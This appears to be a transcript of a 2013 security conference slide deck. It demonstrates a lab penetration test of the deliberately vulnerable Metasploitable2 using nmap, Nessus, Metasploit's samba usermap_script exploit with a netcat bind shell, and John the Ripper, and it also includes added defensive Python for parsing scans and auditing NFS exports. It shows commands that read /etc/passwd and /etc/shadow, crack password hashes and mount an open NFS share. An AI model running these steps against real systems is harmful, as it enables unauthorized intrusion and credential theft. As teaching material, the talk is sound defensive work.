The best defense is a good offense (April 2013 Presentation to Atlantic HTCIA chapter)
1. “Improving your defensive security posture with offensive security strategies”
Andrew Kozma
HTCIA, Atlantic Chapter
Meeting April 18th, 2013
2. A bit about me…
Infosec professional working in healthcare
Co-founder of AtlSecCon
Midnight ethical hacker
A perpetual student
Security researcher/philosopher
Fan of the blues (Secretly want to learn how to play the harmonica)
3. Offensive Security
“How much can you know about yourself if you've never been in a fight?”
~Chuck Palahniuk, Fight Club
Hacking our own infrastructure to improve defensive security measures and processes
Tools – Kali Linux, a security distro maintained by Offensive-Security with all the tools required to test security; it’s free and always will be
Tactics – The application of tools
Strategy – The big picture, all the pieces working together to achieve an ultimate goal
4. Creating a practice environment
“The first rule of fight club is, you don't talk about fight club.”
~Chuck Palahniuk, Fight Club
The goal - a controlled environment where it is safe to practice offensive security techniques
There are many vulnerable distributions that can serve as targets to help build skills (@g0tmi1k’s www.vulnhub.com)
With proper planning and authorization, along with an understanding of the risks, you can test production infrastructure
Virtualization is a beautiful thing!
6. Demo (metasploitable2)
NMAP Scan
Identify OS, Services and open ports
Nessus Vuln Scan
Run a scan to find vulnerabilities that can potentially be
exploited
Metasploit console
Import the info
Exploit the target
Post exploitation
Crack passwords with john
PWN the box
7. Demo (nmap)
• Scanning with nmap
-O OS Detection
-sV Service Version
-sC NSE Scripts
-oX Output in xml format
--stylesheet nmap.xsl
--open
--reason
• Copying the stylesheet to our working directory
• Displaying the nmap scan in Iceweasel (Kali-Linux Browser)
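As an added example (not from the slides), the Python below parses the XML that `-oX` writes into a host/service inventory, which is the same data `db_import` loads into Metasploit later. The XML is a constructed sample in nmap's output schema, not a real scan, and the watchlist of services to review first is an assumption.

```python
import xml.etree.ElementTree as ET

# Constructed sample in nmap's -oX schema (trimmed); not a real scan.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -O -sC -oX scan.xml --open --reason 192.0.2.10">
  <host>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="4.7p1"/>
      </port>
      <port protocol="tcp" portid="139">
        <state state="open" reason="syn-ack"/>
        <service name="netbios-ssn" product="Samba smbd" version="3.X"/>
      </port>
      <port protocol="tcp" portid="2049">
        <state state="open" reason="syn-ack"/>
        <service name="nfs"/>
      </port>
    </ports>
    <os><osmatch name="Linux 2.6.X" accuracy="95"/></os>
  </host>
</nmaprun>
"""

def parse_nmap_xml(xml_text):
    """One dict per open port: addr, os, port, proto, service, product, version, reason."""
    root = ET.fromstring(xml_text)
    rows = []
    for host in root.findall("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        addr = addr_el.get("addr") if addr_el is not None else ""
        osmatch = host.find("os/osmatch")  # best guess from -O; may be absent
        os_name = osmatch.get("name") if osmatch is not None else "unknown"
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # --open already filters these, but be defensive
            svc = port.find("service")
            svc = svc if svc is not None else ET.Element("service")  # unidentified service
            rows.append({"addr": addr, "os": os_name, "port": int(port.get("portid")),
                         "proto": port.get("protocol"), "service": svc.get("name", ""),
                         "product": svc.get("product", ""), "version": svc.get("version", ""),
                         "reason": state.get("reason", "")})
    return rows

def exposed_services(rows, watchlist=("nfs", "netbios-ssn", "microsoft-ds", "vnc")):
    """Ports whose service is on a review watchlist (assumed list), sorted."""
    return sorted(r["port"] for r in rows if r["service"] in watchlist)
```

Run it over a real `-oX` file with `parse_nmap_xml(open("scan.xml").read())` to get the inventory a defender compares against the approved service list.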
9. Demo (Nessus)
• Nessus Vulnerability Scanner
• Not native to Kali-Linux
• Download and install
• dpkg -i “filename”
• Register for Home feed (free)
• Connect to localhost port 8834
• Login and select new scan
10. Demo (Nessus)
• Launch the scan
• Nessus indicates the scan progress
• A summary is displayed once the scan is complete
13. Demo (metasploit)
• Opening the Metasploit Framework Console
• Enter the command “msfconsole”
• Importing our nmap scan results into the metasploit database
• Enter the command “db_import /path to the nmap scan”
14. Demo (metasploit)
• We can validate the db_import by entering the command “hosts” at the msf prompt
• We can also validate the services imported for that host from nmap by entering the command “services” at an msf prompt.
15. Demo (metasploit)
• Import the nessus scan into metasploit with command “db_import /path to the file”
• Now that it is imported into metasploit we can view the vulnerabilities that nessus detected with the command “vulns”
16. Demo (metasploit)
• For this demo we are going to exploit samba
• Load the exploit in msf with the command: “use exploit/multi/samba/usermap_script”
• Once the exploit is loaded we can learn more about its functions via the command “info”
17. Demo (metasploit)
• The command “show options” indicates any variables that require a value to be set
• For this exploit a Remote Host is required to be identified. We will use the command: “set RHOST target.ip.address”
• A payload that will be delivered to the target is required; we issue the command “set PAYLOAD cmd/unix/bind/netcat”
18. Demo (metasploit)
• The command “show options” now indicates the variables for RHOST and PAYLOAD that we previously defined
19. Demo (metasploit)
• We attack the target via the command “exploit”
• Booyah! Shell access to the target!
• We have root level access to the target and interact via this shell
• Let’s display the target system’s user accounts via the command “cat /etc/passwd”
• We are going to select the data displayed and copy it to a .txt file
20. Demo (metasploit)
• Now we need to grab the hashes associated with the user accounts we just viewed
• This can be done by displaying the hashes via the command “cat /etc/shadow”
• Once again we will be selecting the information displayed and will be copying it to a .txt file
22. Demo (John The Ripper)
• We are going to use John The Ripper to crack the passwords for the user accounts
• For John to crack them we have to combine the usernames and their hash into a format that John can understand
• We combine both files into a single one for John to crack with the command: “unshadow /path/passwd.txt /path/shadow.txt > unshadowed.txt”
• We now have a file with usernames and hashes that John can use
23. Demo (John The Ripper)
• We are going to take a quick peek at the contents of the new file
• To do this we change to the directory the file resides in: “cd HTCIA”
• We can display the contents of this file in the terminal with the command “cat unshadowed.txt”
24. Demo (John The Ripper)
• To start cracking the passwords with John we issue the command: “john /path to the filename.txt”
• John has loaded the hashes and has successfully cracked some of the passwords
• Previously cracked passwords can be viewed with the command: “john --show /Path to the file.txt”
25. Demo (Post Exploitation)
• Using our new creds to SSH to the exploited workstation
• To connect via SSH we use the command: “ssh -l msfadmin Target.IP.Address”
• Now we have a terminal session vs a shell
• In the real world we could continue to install backdoors, steal data, pivot to scan for other hosts
26. Demo (Post Exploitation)
• Let’s review other services so that we can maintain a persistent presence on the compromised workstation
• Hmmm NFS services are running on the target…
27. Demo (Post Exploitation)
• Let’s take a quick look at the NFS share available on the target
• Uh oh… everything is shared
• We are going to create a temp directory and then mount the share in it
• Let’s display the filesystem to see the NFS share mounted in temp
28. Demo (Post Exploitation)
• Looking into the share that we mounted…
• We already know we can copy the contents of the passwd and shadow files again
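The “everything is shared” condition above is exactly what an exports audit catches before anyone mounts the share. The Python below is an added example, not from the slides: it parses an /etc/exports file (the sample content is constructed) and flags a root export, wildcard clients, writable shares with no_root_squash, and the insecure option; the finding names are assumptions.

```python
import re
import shlex

# Constructed sample /etc/exports, not copied from any real host.
SAMPLE_EXPORTS = """\
# backups and home are scoped; the first line shares the whole box
/               *(rw,sync,no_root_squash,no_subtree_check)
/srv/backups    10.0.0.0/24(ro,sync,root_squash)
/home/shared    *(ro) 10.0.0.5(rw,no_root_squash)
"""

# "client(opt,opt)" -- client may be empty, options may be absent
CLIENT_RE = re.compile(r"^([^(]*)(?:\((.*)\))?$")

def parse_exports(text):
    """Return (path, client, options_set) for every client spec in an exports file."""
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        fields = shlex.split(line)          # tolerates quoted paths with spaces
        path, specs = fields[0], fields[1:] or ["*"]   # no client at all = world
        for spec in specs:
            m = CLIENT_RE.match(spec)
            if not m:          # malformed spec such as "host(rw" -> skip it
                continue
            client, opts = m.groups()
            # a space before "(" makes exportfs apply the options to everyone
            client = client or "*"
            options = {o.strip() for o in (opts or "").split(",") if o.strip()}
            entries.append((path, client, options))
    return entries

def audit_exports(text):
    """Flag the settings that let a remote mount read or write the whole host as root."""
    findings = []
    for path, client, opts in parse_exports(text):
        if path == "/":
            findings.append((path, client, "entire root filesystem exported"))
        if client in ("*", "0.0.0.0/0"):
            findings.append((path, client, "exported to any host"))
        if "rw" in opts and "no_root_squash" in opts:
            findings.append((path, client, "writable with no_root_squash"))
        if "insecure" in opts:
            findings.append((path, client, "accepts non-privileged source ports"))
    return findings
```

A clean result from `audit_exports(open("/etc/exports").read())` is the check to run on the Nessus-flagged hosts; the fix is to scope each export to a subnet and keep root_squash (the default).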
29. Demo (Post Exploitation)
• Remember our Nessus output
• Collect as much information as possible during the information gathering phase…
• Sometimes you get lucky! The VNC server password was identified in the scan by Nessus
30. Breaking things to make them better
“At the time, my life just seemed too complete, and maybe we have to break everything to make something better out of ourselves.” ~Chuck Palahniuk, Fight Club
When you start looking at production systems it is important to have a demonstrated, repeatable process that has buy-in from management
Document your findings indicating the threat, the likelihood of occurrence and the impact to the business
Use this information to build business cases for investment in security solutions
When you start looking at the production environment… there will be blood….
32. Advanced Persistent Response
“On a long enough time line, the survival rate for everyone drops to zero.” ~Chuck Palahniuk, Fight Club
Understanding trends and current threats
Filling in the gaps with security (Technology and process)
Creating and implementing a security model that meets organizational needs
33. Incident Response
“With a gun barrel between your teeth, you speak only in vowels.” ~Chuck Palahniuk, Fight Club
Preparation – Have a plan, know who to call and when
Identification – Determination of whether or not there was an incident
Containment – Protecting other critical systems, “stop the bleeding”
Eradication – Addressing the vulnerabilities that were exploited
Recovery – Returning to operational status
Follow-up – Lessons learned, prevent future incidents of the same nature
34. Parting thoughts
Do you still think the best defense is a good offense?
IMHO ~ A good offense helps to make a great defense! (with proper planning and execution)
35. References
Jeremy Druin @webpwnized has a great tutorial online going into more detail:
http://www.youtube.com/watch?v=0fbBwGAuINw
@netbiosx has a tutorial available online regarding NFS and metasploitable2:
http://pentestlab.wordpress.com/2013/01/20/nfs-misconfiguration/
Nessus software and home feed licensing can be found on their site:
http://www.tenable.com/
Kali-Linux can be obtained at www.kali.org and is maintained by Offensive-Security
Metasploitable2 is maintained by Rapid7 and is available for download from:
https://community.rapid7.com/docs/DOC-1875
Why stop here! There are many other distros to help expand your skillset; check out @g0tmi1k and his website at http://vulnhub.com/